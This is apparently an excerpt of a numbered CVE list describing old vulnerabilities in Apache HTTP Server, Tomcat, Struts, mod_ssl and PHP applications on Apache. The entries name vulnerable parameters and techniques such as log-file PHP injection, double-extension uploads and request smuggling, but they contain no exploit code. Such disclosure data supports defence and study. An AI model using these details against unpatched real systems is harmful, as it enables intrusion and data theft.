5068| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5069| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
5070| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
5071| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
5072| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
5073| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
5074| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
5075| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
5076| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
5077| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
5078| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
5079| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
5080| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
5081| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
5082| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5083| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5084| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
5085| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
5086| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
5087| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
5088| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
5089| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
5090| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
5091| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5092| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
5093| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
5094| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
5095| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
5096| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
5097| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5098| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
5099| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5100| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
5101| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
5102| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
5103| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
5104| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
5105| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
5106| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
5107| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
5108| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
5109| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
5110| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
5111| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
5112| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
5113| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
5114| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
5115| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
5116| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
5117| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
5118| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
5119| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
5120| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
5121| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
5122| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
5123| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
5124| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
5125| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
5126| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
5127| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
5128| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
5129| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
5130| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
5131| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
5132| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
5133| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5134| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
5135| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
5136| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
5137| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
5138| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
5139| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
5140| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
5141| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
5142| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
5143| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
5144| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
5145| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
5146| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
5147| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
5148| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
5149| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
5150| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
5151| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
5152| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
5153| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
5154| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
5155| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
5156| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
5157| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
5158| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5159| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
5160| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
5161| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
5162| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
5163| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
5164| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
5165| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
5166| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
5167| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
5168| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
5169| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
5170| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
5171| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
5172| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
5173| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
5174| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
5175| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
5176| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5177| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
5178| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
5179| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
5180| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
5181| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
5182| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
5183| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
5184| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
5185| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
5186| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
5187| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
5188| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
5189| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
5190| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
5191| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
5192| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
5193| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
